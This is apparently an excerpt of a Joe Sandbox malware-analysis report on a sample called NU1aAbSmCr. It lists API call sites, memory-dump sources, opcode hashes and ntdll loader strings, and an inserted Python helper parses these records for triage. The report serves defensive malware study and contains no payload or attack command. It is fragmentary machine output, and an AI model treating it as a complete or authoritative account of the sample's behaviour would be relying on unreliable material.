                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: 827962f8e5b6eea344056bc0e8c834f660838af0f0cd76d3b4da636ad4f1341f
                                                      • Instruction ID: 71441ec039304675d8532f3ccb864b1527d6cd1b6168a292b1f3398713e3bfcd
                                                      • Opcode Fuzzy Hash: 827962f8e5b6eea344056bc0e8c834f660838af0f0cd76d3b4da636ad4f1341f
                                                      • Instruction Fuzzy Hash: 7EE04F756006147BD160AA5ADC41FDB77ACDFC5714F40445AFA08A7282C6B47A1186F4

Control-flow Graph
• control_flow_graph 115 417b6a-417b6c 116 417b39-417b47 LdrLoadDll 115->116 117 417b6e 115->117 118 417b4a-417b4d 116->118
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B45
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: d32d0c987d681beb1f8220a0573b2f2b011218fec3aa742dd90691c8de5758f3
                                                      • Instruction ID: f93e50e1d3076807ff20cbd814b72f48560988693ec6e8ee0dfa18ee3505d4d8
                                                      • Opcode Fuzzy Hash: d32d0c987d681beb1f8220a0573b2f2b011218fec3aa742dd90691c8de5758f3
                                                      • Instruction Fuzzy Hash: 3CD01270A4810A6AD740CA98CC42FA8FBA4DB49209F0402C5F90C9F181D5717984C795
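The entries above are the raw per-function records Joe Sandbox emits for each disassembled function: the API call with its call-site address, the memory dump the code came from, and the opcode/instruction identifiers used for similarity matching. As an added example (not code from the report or from Joe Sandbox), the Python below parses such records and answers three questions a reviewer asks of this page: which APIs each dumped region calls, which call sites were attributed to several overlapping function starts (the PostThreadMessageW call at 0041438A appears under four different Instruction IDs above), and which regions carry ntdll-internal strings. It assumes an entry ends at its "Instruction Fuzzy Hash" line and that the "Offset" field identifies the region; SAMPLE is constructed from entries on this page, trimmed to the fields the parser uses and with the long String ID shortened.

```python
"""Triage helper for the per-function entries in a Joe Sandbox report.

Added example; not part of the report or of Joe Sandbox. SAMPLE is
constructed from entries on this page (fields trimmed, String ID shortened).
"""
import re
from collections import defaultdict

SAMPLE = r"""
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B45
• Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: Load
• Instruction ID: d12cc20611dbccb473ffbd96b21e27a4a6f02d97c40ee013a5ef017d1ba0565a
• Instruction Fuzzy Hash: F4015EB1E0420DABDB10DAA1DD42FDEB378AB54308F4041AAEA0897240F674EB498B95
• NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C9EA
• Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: Close
• Instruction ID: c3916fea0772bbdbc0279c8410de1fff15ffbf804abd9fb5993c11b118a3ee5e
• Instruction Fuzzy Hash: 61E086716042147BD620FA5ADC02F9B776CDFC5714F40445AFE0867242C7747A0187F4
• PostThreadMessageW.USER32(41392M9L,00000111,00000000,00000000), ref: 0041438A
• Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: MessagePostThread
• Instruction ID: 42976dbd2dceaa1e0a977a924473439363ed6aa6ab46c42b953b71c348218e9c
• Instruction Fuzzy Hash: 3F0104B2D0021C7ADB01AAE19C82DEFBB7CEF40798F448069FA04A7141D5788F068BB1
• PostThreadMessageW.USER32(41392M9L,00000111,00000000,00000000), ref: 0041438A
• Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: MessagePostThread
• Instruction ID: 3fa6e5ee1cf9f8121619ab0affa830f4b3690b6f4062a0325252bb4d0d93531c
• Instruction Fuzzy Hash: 8F01D6B2D4121C7ADB11AAE19C82DEFBB7CDF41798F448069FA14A7141D5788F068BB1
• Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
• API ID:
• String ID: @$@$CFGOptions$GlobalFlag$LdrpInitializeExecutionOptions$minkernel\ntdll\ldrinit.c
• Instruction ID: 8250cbb38c769c1152cab639821971c4973feb0ac4e95b2fb097ee145ada4182
• Instruction Fuzzy Hash: 8A928C71604342AFE721CE29CC90B6BBBE9BB84754F04492DFA95DB390D770E844CB92
"""

# "• Api.MODULE(args), ref: ADDRESS" lines under the APIs header
API_LINE = re.compile(r"^• (?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
# "• Key: value" metadata lines; only the keys below are kept
FIELD_LINE = re.compile(r"^• (?P<key>[A-Za-z ]+?): ?(?P<value>.*)$")
FIELDS = {"Source File", "API ID", "String ID", "API String ID", "Opcode ID",
          "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash"}


def parse_entries(text):
    """One dict per function entry; an entry ends at its Instruction Fuzzy Hash.
    A trailing entry that is cut off (as at the end of a truncated page) is dropped."""
    entries, cur = [], {"apis": []}
    for raw in text.splitlines():
        line = raw.strip()
        m = API_LINE.match(line)
        if m:
            cur["apis"].append((m["module"], m["api"], m["ref"].upper()))
            continue
        m = FIELD_LINE.match(line)
        if not m or m["key"] not in FIELDS:
            continue
        key, value = m["key"], m["value"].strip()
        if key == "Source File":
            # "...sdmp, Offset: 00400000, based on PE: true" -> region keyed by Offset
            off = re.search(r"Offset: ([0-9A-Fa-f]+)", value)
            cur["offset"] = off.group(1).upper() if off else "UNKNOWN"
            cur["source"] = value.split(",")[0]
        else:
            cur[key] = value
        if key == "Instruction Fuzzy Hash":
            entries.append(cur)
            cur = {"apis": []}
    return entries


def apis_by_region(entries):
    """Region offset -> sorted 'MODULE!Api' names called from functions in it."""
    regions = defaultdict(set)
    for e in entries:
        regions.setdefault(e["offset"], set())
        for module, api, _ in e["apis"]:
            regions[e["offset"]].add(f"{module}!{api}")
    return {k: sorted(v) for k, v in regions.items()}


def duplicate_call_sites(entries):
    """(API, ref address) attributed to more than one Instruction ID: overlapping
    function starts around a single call, which triage can collapse to one site."""
    seen = defaultdict(set)
    for e in entries:
        for module, api, ref in e["apis"]:
            seen[(f"{module}!{api}", ref)].add(e.get("Instruction ID"))
    return {k: len(v) for k, v in seen.items() if len(v) > 1}


def regions_with_ntdll_strings(entries):
    """Regions whose embedded strings include ntdll source paths, i.e. a copy of
    ntdll code rather than the sample's own code."""
    return sorted({e["offset"] for e in entries if "\\ntdll\\" in e.get("String ID", "")})


if __name__ == "__main__":
    es = parse_entries(SAMPLE)
    for region, apis in apis_by_region(es).items():
        print(region, apis)
    print("duplicated call sites:", duplicate_call_sites(es))
    print("regions with ntdll strings:", regions_with_ntdll_strings(es))
```

Run against the full report text instead of SAMPLE, the region summary separates the APIs reached from the sample's own image at 00400000 (LdrLoadDll, NtClose, RtlAllocateHeap, RtlFreeHeap, ExitProcess, PostThreadMessageW) from the 015B0000 region, whose entries carry ntdll-internal strings and no resolved API names of their own.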

Control-flow Graph
• control_flow_graph 119 1622c0a-1622c0f 120 1622c11-1622c18 119->120 121 1622c1f-1622c26 LdrInitializeThunk 119->121
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 5757b8eeb315fced8404229affb36b42493b773890ecf5f22d5d392d1da97638
                                                      • Instruction ID: 0ecff2aca33659c0c3924ebc81bfa6ca81043a41d1ddbae41014f68c756c0c9a
                                                      • Opcode Fuzzy Hash: 5757b8eeb315fced8404229affb36b42493b773890ecf5f22d5d392d1da97638
                                                      • Instruction Fuzzy Hash: B4B09B71D019D5C5DA51E7644E08717791477D0701F15C165E2034751F4738C1D1F675
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2160512332
                                                      • Opcode ID: f623e7b58054c7931f14334ff8ce8173543e31d0e1c54f1e7de31f2169a125d7
                                                      • Instruction ID: 8250cbb38c769c1152cab639821971c4973feb0ac4e95b2fb097ee145ada4182
                                                      • Opcode Fuzzy Hash: f623e7b58054c7931f14334ff8ce8173543e31d0e1c54f1e7de31f2169a125d7
                                                      • Instruction Fuzzy Hash: 8A928C71604342AFE721CE29CC90B6BBBE9BB84754F04492DFA95DB390D770E844CB92
                                                      Strings
                                                      • Address of the debug info found in the active list., xrefs: 016554AE, 016554FA
                                                      • Critical section address., xrefs: 01655502
                                                      • Invalid debug info address of this critical section, xrefs: 016554B6
                                                      • Thread identifier, xrefs: 0165553A
                                                      • 8, xrefs: 016552E3
                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01655543
                                                      • double initialized or corrupted critical section, xrefs: 01655508
                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016554E2
                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0165540A, 01655496, 01655519
                                                      • Critical section debug info address, xrefs: 0165541F, 0165552E
                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016554CE
                                                      • corrupted critical section, xrefs: 016554C2
                                                      • undeleted critical section in freed memory, xrefs: 0165542B
                                                      • Critical section address, xrefs: 01655425, 016554BC, 01655534
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                      • API String ID: 0-2368682639
                                                      • Opcode ID: 8b115cffb62d07f2c5d525b77cd8486c02ea06894ff97e578f5f24c8dc5b1445
                                                      • Instruction ID: 454d64714f95e5f71af499e13c1519b3a594014a5269c1a2a38d60f41322fcb8
                                                      • Opcode Fuzzy Hash: 8b115cffb62d07f2c5d525b77cd8486c02ea06894ff97e578f5f24c8dc5b1445
                                                      • Instruction Fuzzy Hash: 2681ACB0A01359EFDB60CF99CC44BAEBBB9BB49B04F14411DF905BB241D3B5A941CB90
                                                      Strings
                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01652506
                                                      • @, xrefs: 0165259B
                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01652412
                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01652624
                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01652498
                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01652409
                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016525EB
                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0165261F
                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016522E4
                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016524C0
                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01652602
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                      Strings
                                                      • HandleTraces, xrefs: 01668C8F
                                                      • VerifierDlls, xrefs: 01668CBD
                                                      • VerifierDebug, xrefs: 01668CA5
                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01668A3D
                                                      • AVRF: -*- final list of providers -*- , xrefs: 01668B8F
                                                      • VerifierFlags, xrefs: 01668C50
                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01668A67
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01639A01
                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01639A2A
                                                      • LdrpInitShimEngine, xrefs: 016399F4, 01639A07, 01639A30
                                                      • apphelp.dll, xrefs: 015D6496
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01639A11, 01639A3A
                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016399ED
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01652178
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01652180
                                                      • SXS: %s() passed the empty activation context, xrefs: 01652165
                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0165219F
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016521BF
                                                      • RtlGetAssemblyStorageRoot, xrefs: 01652160, 0165219A, 016521BA
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                      Strings
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01658181, 016581F5
                                                      • Loading import redirection DLL: '%wZ', xrefs: 01658170
                                                      • LdrpInitializeProcess, xrefs: 0161C6C4
                                                      • LdrpInitializeImportRedirection, xrefs: 01658177, 016581EB
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0161C6C3
                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 016581E5
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                      APIs
                                                        • Part of subcall function 01622DF0: LdrInitializeThunk.NTDLL ref: 01622DFA
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01620BA3
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01620BB6
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01620D60
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01620D74
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                      • String ID:
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                      Strings
                                                      • LdrpInitializeProcess, xrefs: 01618422
                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0161855E
                                                      • @, xrefs: 01618591
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01618421
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016522B6
                                                      • SXS: %s() passed the empty activation context, xrefs: 016521DE
                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016521D9, 016522B1
                                                      • .Local, xrefs: 016128D8
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                      Strings
                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01653456
                                                      • RtlDeactivateActivationContext, xrefs: 01653425, 01653432, 01653451
                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01653437
                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0165342A
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                      Strings
                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01640FE5
                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016410AE
                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01641028
                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0164106B
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                      Strings
                                                      • LdrpDynamicShimModule, xrefs: 0164A998
                                                      • apphelp.dll, xrefs: 01602462
                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0164A992
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0164A9A2
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • HEAP: , xrefs: 015F3264
                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 015F327D
                                                      • HEAP[%wZ]: , xrefs: 015F3255
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-4253913091
                                                      • Opcode ID: e91fad08b7096ba9e3b45c36c9a7303b4b0ed287b283c8bcfe5eb9ce5787a404
                                                      • Instruction ID: d5b76cb1ea800d229ccae8aa852007dec9f4ed07f787f5101e91a02753b14b68
                                                      • Opcode Fuzzy Hash: e91fad08b7096ba9e3b45c36c9a7303b4b0ed287b283c8bcfe5eb9ce5787a404
                                                      • Instruction Fuzzy Hash: 9DF1BF30A01606DFEB25CF68C994B6AB7F6FF44704F1885ADE6169B392D730E941CB90
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $@
                                                      • API String ID: 0-1077428164
                                                      • Opcode ID: ecc4139566633821532ad27c4451ac5b08eda8dad24060b7e442fee1357f7e78
                                                      • Instruction ID: b920c96a94633471f20768df0be891e45b44659a4a25725bbfb521743f527968
                                                      • Opcode Fuzzy Hash: ecc4139566633821532ad27c4451ac5b08eda8dad24060b7e442fee1357f7e78
                                                      • Instruction Fuzzy Hash: BEC27F716093519FE72ACF28CC40BABBBE5AF88754F05892DE9C987381D734E845CB52
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                      • API String ID: 0-2779062949
                                                      • Opcode ID: 3afd008a22c5fbc6584d1b0a79f4f45359c1ff049a43ee9768bd03989325de23
                                                      • Instruction ID: 1c741fe87d74e4ad9ed4cd62adb67c756052da2fb77a5ae0c14ce7abc6d9635d
                                                      • Opcode Fuzzy Hash: 3afd008a22c5fbc6584d1b0a79f4f45359c1ff049a43ee9768bd03989325de23
                                                      • Instruction Fuzzy Hash: F4A18F719116299BDB31DF28CC88BEAB7B8FF44710F1001EAE909A7251E7359E84CF54
                                                      Strings
                                                      • LdrpCheckModule, xrefs: 0164A117
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0164A121
                                                      • Failed to allocated memory for shimmed module list, xrefs: 0164A10F
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-161242083
                                                      • Opcode ID: bee4a7390112cca1c1b00cea1d15da7992ccc49041a605e8e50c5de7fc99144b
                                                      • Instruction ID: e91d5cf8b0d0cc8cb65a6378a0bb8f6fb1ca77a256a9e32b5918faddf3ac6089
                                                      • Opcode Fuzzy Hash: bee4a7390112cca1c1b00cea1d15da7992ccc49041a605e8e50c5de7fc99144b
                                                      • Instruction Fuzzy Hash: 9471C171E402069FDB2ADFA8CD81BAEB7F5FB48644F15402DE506DB351E734A942CB50
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-1334570610
                                                      • Opcode ID: 1defb1d777b265b940bd7086c2c91b963295e239a6a9609f6fe06660bbf123dc
                                                      • Instruction ID: 3c2c7769393656a0f69a9832897860708d1c70ca49ecf12fc0812f3555d319ff
                                                      • Opcode Fuzzy Hash: 1defb1d777b265b940bd7086c2c91b963295e239a6a9609f6fe06660bbf123dc
                                                      • Instruction Fuzzy Hash: 5861B270600346DFDB29DF28C880B6ABBE2FF45704F18855DE59A8F296D770E881CB91
                                                      Strings
                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 016582DE
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 016582E8
                                                      • Failed to reallocate the system dirs string !, xrefs: 016582D7
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1783798831
                                                      • Opcode ID: c3d327b624eb42be398b625644fba0b6e5f12d93668cc97940d2348ad223e348
                                                      • Instruction ID: 5d8f0b9bdaf34fcf2ff248550fad74f7eb2e70366c86f329f48f1d3ae0c39afc
                                                      • Opcode Fuzzy Hash: c3d327b624eb42be398b625644fba0b6e5f12d93668cc97940d2348ad223e348
                                                      • Instruction Fuzzy Hash: C841F1B1951312ABD721EB69DC44B6B7BE8FF84750F04482EF944D7294E7B0D800CB92
                                                      Strings
                                                      • PreferredUILanguages, xrefs: 0169C212
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0169C1C5
                                                      • @, xrefs: 0169C1F1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                      • API String ID: 0-2968386058
                                                      • Opcode ID: a0782d5b13be4c930e6a9ff18483f136d8b49ee825d76376810693e5169489f7
                                                      • Instruction ID: 19217f2aa71fb92fe1f2e7b44072de2221966e8ff4fe4fc5a50828ebd235197c
                                                      • Opcode Fuzzy Hash: a0782d5b13be4c930e6a9ff18483f136d8b49ee825d76376810693e5169489f7
                                                      • Instruction Fuzzy Hash: C3416271E0021AABDF11DBD8CC91BEEBBBDAB55704F1480AAE605A7280D7749A45CB50
